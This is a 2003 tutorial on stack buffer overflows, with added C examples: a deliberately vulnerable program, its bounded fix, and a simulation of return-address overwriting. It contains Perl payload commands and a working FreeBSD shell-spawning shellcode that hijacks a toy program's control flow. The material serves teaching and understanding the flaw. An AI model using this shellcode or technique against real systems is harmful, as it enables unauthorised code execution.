Buffer Overflows Tutorial

Meta: August 12th 2003 // Articles

If you are into IT security, hacking, or whatever you want to call it, you have
probably come across BOF, the buffer overflow. It has a reputation as one of the
most difficult or challenging areas. (In my opinion it is not.)

In this article I will try to explain the basic idea behind it. I am not going
into detail or a specific example, since there are plenty of texts out there
doing that; I will just describe how this kind of exploit works.

NOTE : At the end of this article you will find a list of texts describing this
technique in detail, with examples.

=================================

Every executable file uses some memory once we run it. (Remember that.) Some
memory regions hold data, some hold instructions, and some hold addresses
(pointers), such as the address a function must return to when it finishes.

Imagine the following :

we do : ./tool
next we have this (addresses as gdb shows them when disassembling the program) :

Memory for this tool starts --> 0x8048448
...
0x8048451   call 0x8048440 <f>
...
...
Memory for this tool ends   --> 0x804845a

As you can see there is a start and an end for every execution. We will pay
attention to what happens in between, where "tool" calls a function: the call
pushes the return address (the address of the instruction right after the call)
onto the stack, f runs, and the "ret" at the end of f pops that saved address back
into EIP so execution continues where it left off.

If we could change that saved address to the address of code we have loaded
ourselves, we could run anything we wanted during the execution of the application.

So, in order to change that address we need to overflow a buffer inside f. The
buffer is a local variable on the stack and the saved return address sits a few
bytes above it, so writing past the end of the buffer overwrites the return
address and lets us point execution at our code somewhere else in memory.

First of all we need to find input that makes "tool" overflow, i.e. more data
than its buffer can hold.

Let's imagine that there is a buffer in "tool" : char data[10]; used during
execution.
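A stand-in for the "tool" the text keeps referring to, written here as an added example (it is not code from the original article): a program whose char data[10] is filled from its argument with strcpy and so overflows exactly as described, next to a bounded version that does not. The compile flags in the comment switch off the stack protector, the non-executable stack and PIE that modern toolchains enable by default and that did not exist in 2003; the function names and the --fixed switch are my own.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define DATA_SIZE 10   /* the char data[10] the text talks about */

/* The target as the text describes it: copy the argument into a 10-byte
 * stack buffer with no length check. Everything past byte 10 lands on the
 * stack above data[]: alignment padding, the saved frame pointer and then
 * the saved return address, which is what the later steps aim at. */
static void tool_vulnerable(const char *arg)
{
    char data[DATA_SIZE];
    strcpy(data, arg);                 /* unbounded copy: this is the overflow */
    printf("tool got: %s\n", data);
}

/* Bounded replacement: copies at most cap-1 bytes, always NUL-terminates,
 * and reports whether the input had to be cut. Returns -1 for cap == 0. */
static int copy_bounded(char *dst, size_t cap, const char *src)
{
    size_t n;
    if (cap == 0)
        return -1;
    n = strlen(src);
    if (n >= cap) {
        memcpy(dst, src, cap - 1);
        dst[cap - 1] = '\0';
        return 1;                      /* truncated */
    }
    memcpy(dst, src, n + 1);
    return 0;
}

/* Same idea for input read from stdin (the "./tool < file" form): fgets stops
 * at cap-1 bytes, and the rest of an over-long line is drained so the next
 * read does not see it. Returns 1 if the line was cut, 0 if it fit, -1 on
 * EOF before any data. */
static int read_line_bounded(char *dst, size_t cap, FILE *in)
{
    size_t n;
    int c;
    if (fgets(dst, (int)cap, in) == NULL)
        return -1;
    n = strlen(dst);
    if (n > 0 && dst[n - 1] == '\n') {
        dst[n - 1] = '\0';
        return 0;
    }
    /* no newline in the buffer: either the line was exactly cap-1 bytes or it was longer */
    c = fgetc(in);
    if (c == EOF || c == '\n')
        return 0;
    while (c != '\n' && c != EOF)      /* drain the part that did not fit */
        c = fgetc(in);
    return 1;
}

static void tool_fixed(const char *arg)
{
    char data[DATA_SIZE];
    if (copy_bounded(data, sizeof data, arg) == 1)
        fprintf(stderr, "input longer than %d bytes, truncated\n", DATA_SIZE - 1);
    printf("tool got: %s\n", data);
}

/* ./tool <arg> runs the vulnerable version, ./tool --fixed <arg> the safe one.
 * To reproduce the article's crash on a current x86 box, build with the
 * 2003-era defaults restored:
 *   gcc -m32 -O0 -fno-stack-protector -z execstack -no-pie -o tool tool.c */
int main(int argc, char **argv)
{
    if (argc >= 3 && strcmp(argv[1], "--fixed") == 0)
        tool_fixed(argv[2]);
    else if (argc >= 2)
        tool_vulnerable(argv[1]);
    else
        fprintf(stderr, "usage: %s [--fixed] <argument>\n", argv[0]);
    return 0;
}
```

Run it with a 20-byte argument and the vulnerable path behaves as the rest of the article describes; the --fixed path keeps the first 9 bytes and says so on stderr.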

Easy to see what we need to do to overflow that buffer, right ?

1) Create an environment variable : export BUFFER=`perl -e 'print "A"x20'`

- print "A"x20 // This prints the buffer we want to send
               // Choose the length so that a) if you know the buffer size,
               // it is at least twice as big, or b) if you don't know the
               // buffer size, it is very big, e.g. print "A"x2000

2) Send "tool" more data than the 10 chars (a char is one byte, so 10 bytes) the buffer can hold.

It depends on the software you want to exploit, e.g.

a) if the tool takes arguments from the command line like this : ./tool arg1 arg2 ...

We can pass our buffer like this : ./tool $BUFFER

b) if the tool reads its input from stdin like this : ./tool < file

"<" expects a file name, not a variable, so we write the buffer to a file first :

perl -e 'print "A"x20' > BUFFER.txt
./tool < BUFFER.txt

Now you need to see the following error after running the software, so you can be sure
there is a buffer overflow at that spot :

[me@cipher]$ ./tool $BUFFER
Segmentation fault (core dumped)

A segmentation fault means the program touched memory it is not allowed to. Here that
happens because we overflowed the buffer, overwrote the saved return address, and the
CPU tried to continue at an address that is not mapped.

If we look at the registers in gdb (for example by loading the core file and running
"info registers"), EIP will be 0x41414141 (0x41 is "A" in hex), which means our A's
replaced the saved return address and the function returned to 0x41414141.

If we could overflow "tool" with the address where our own code is loaded instead of
A's, we could run whatever we wanted.

OK, it is a bit difficult to know the address where our code is loaded, so we put
the shellcode in an environment variable. We do that because the environment is
stored at a predictable place near the top of the stack, so we can work out where
it starts. (This holds on systems without stack address randomization, which was
the normal case in 2003; with randomization the address changes on every run and
has to be guessed or leaked.)

Let's say that the environment variable starts at : 0xbffffb54

If we want to send that address in the buffer of "tool", we need to overflow
"tool" using 0xbffffb54 as the argument.

so let's do that :
perl -e 'print "\x54\xfb\xff\xbf"x20' > BUFFER.txt // \x54\xfb\xff\xbf is 0xbffffb54 written
                                                  // least significant byte first, as x86
                                                  // stores it; 0x54 is the letter T, which
                                                  // is why the payload looks like "T" plus
                                                  // three unprintable bytes

If we do : ./tool < BUFFER.txt, EIP will be 0xbffffb54, so we know it will execute
our code. Two things have to be right for that: one of the repeated copies of the
address must land exactly on the saved return address, i.e. the distance from the
start of the buffer to the return address must be a multiple of 4 (if it is not,
put one to three filler bytes in front so the copies line up), and the address must
point at the first byte of the shellcode, not at the "BUFFER=" prefix the environment
stores in front of the value.
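What the two runs above put into EIP, and why the address has to be written byte-reversed, worked through in C as an added example (not code from the original article). The struct models the frame of the function that owns char data[10]: buffer, two bytes of alignment padding, saved EBP, saved return address, which is how gcc -O0 lays out a 32-bit x86 frame with no other locals. The 16-byte distance and the "legitimate" return address 0x8048456 (the instruction after the call at 0x8048451 in the listing, assuming a 5-byte call) are assumptions; on a real target you measure the distance in gdb. The copy is clamped at the end of the modelled frame so the program itself does not crash.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Assumed frame layout of the function holding char data[10], as gcc -O0
 * lays it out on 32-bit x86: buffer, padding to a 4-byte boundary, saved
 * EBP, saved return address. Real frames may hold more locals in between;
 * the exact distance is what you measure with gdb. */
struct frame {
    char data[10];
    unsigned char pad[2];
    unsigned char saved_ebp[4];
    unsigned char saved_eip[4];   /* popped into EIP by "ret" */
};

/* Hypothetical legitimate return address: the instruction after the
 * "call 0x8048440" at 0x8048451 in the listing (a 5-byte call). */
#define LEGIT_RET 0x08048456u

/* x86 stores a 32-bit value least significant byte first, so 0xbffffb54
 * becomes the bytes 54 fb ff bf, and 0x54 is ASCII "T". */
static void le32_encode(uint32_t v, unsigned char out[4])
{
    out[0] = (unsigned char)(v & 0xff);
    out[1] = (unsigned char)((v >> 8) & 0xff);
    out[2] = (unsigned char)((v >> 16) & 0xff);
    out[3] = (unsigned char)((v >> 24) & 0xff);
}

/* What the CPU reads back: the same four bytes, least significant first. */
static uint32_t le32_decode(const unsigned char b[4])
{
    return (uint32_t)b[0] | ((uint32_t)b[1] << 8) |
           ((uint32_t)b[2] << 16) | ((uint32_t)b[3] << 24);
}

/* Distance from the start of data[] to the saved return address. */
static size_t frame_ret_offset(void)
{
    return offsetof(struct frame, saved_eip);
}

/* The article's payload: `pad` filler bytes ("A"), then `addr` repeated
 * `reps` times in little-endian form. Returns the length, 0 if cap is too small. */
static size_t build_payload(unsigned char *out, size_t cap, size_t pad,
                            uint32_t addr, size_t reps)
{
    size_t i, n = pad + 4 * reps;
    if (n > cap)
        return 0;
    memset(out, 'A', pad);
    for (i = 0; i < reps; i++)
        le32_encode(addr, out + pad + 4 * i);
    return n;
}

/* What strcpy(data, input) does to the frame, and the value EIP will hold
 * when the function returns. The copy is clamped at the end of the frame so
 * this example stays within defined behaviour; a real strcpy keeps writing. */
static uint32_t simulate_overflow(const unsigned char *input, size_t len)
{
    struct frame f;
    size_t n = len < sizeof f ? len : sizeof f;
    memset(&f, 0, sizeof f);
    le32_encode(LEGIT_RET, f.saved_eip);
    memcpy(&f, input, n);              /* bytes 0..9 fill data[], the rest spills upward */
    return le32_decode(f.saved_eip);
}

int main(void)
{
    unsigned char p[128];
    size_t n;
    printf("saved return address sits %zu bytes past data[]\n", frame_ret_offset());
    printf("\"hello\"          -> EIP = 0x%08x (untouched)\n",
           simulate_overflow((const unsigned char *)"hello", 5));
    printf("\"A\" x 20         -> EIP = 0x%08x\n",
           simulate_overflow((const unsigned char *)"AAAAAAAAAAAAAAAAAAAA", 20));
    n = build_payload(p, sizeof p, 0, 0xbffffb54u, 20);
    printf("addr x 20        -> EIP = 0x%08x\n", simulate_overflow(p, n));
    n = build_payload(p, sizeof p, 1, 0xbffffb54u, 20);
    printf("\"A\" + addr x 20  -> EIP = 0x%08x (misaligned by one byte)\n",
           simulate_overflow(p, n));
    return 0;
}
```

Built with plain gcc, the "A" x 20 case gives 0x41414141 and the address x 20 case gives 0xbffffb54, as in the text; the last run shifts the payload by a single byte and EIP ends up as 0xfffb54bf, which is why the distance to the return address has to be measured rather than guessed.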

Let's load a SHELLCODE in the environment and do it all together (the same variable
name is reused, so this replaces the A's from step 1) :

[me@cipher]$ export BUFFER=`perl -e 'print "\xeb\x0e\x5e\x31\xc0\x88\x46\x07\x50\x50\x56\xb0\x3b\x50\xcd\x80\xe8\xed\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23"'`
[me@cipher]$ perl -e 'print "\x54\xfb\xff\xbf"x20' > BUFFER.txt
[me@cipher]$ ./tool < BUFFER.txt
$

The "$" prompt at the end is the /bin/sh started by the shellcode.

Please NOTE : SHELLCODE is different for each OS and architecture. The one above
is for FreeBSD.

The BEST tutorials on BOF

Smashing The Stack For Fun And Profit (Aleph One, Phrack 49)
BOF with PERL
Stack Smashing Vulnerabilities
l0pht
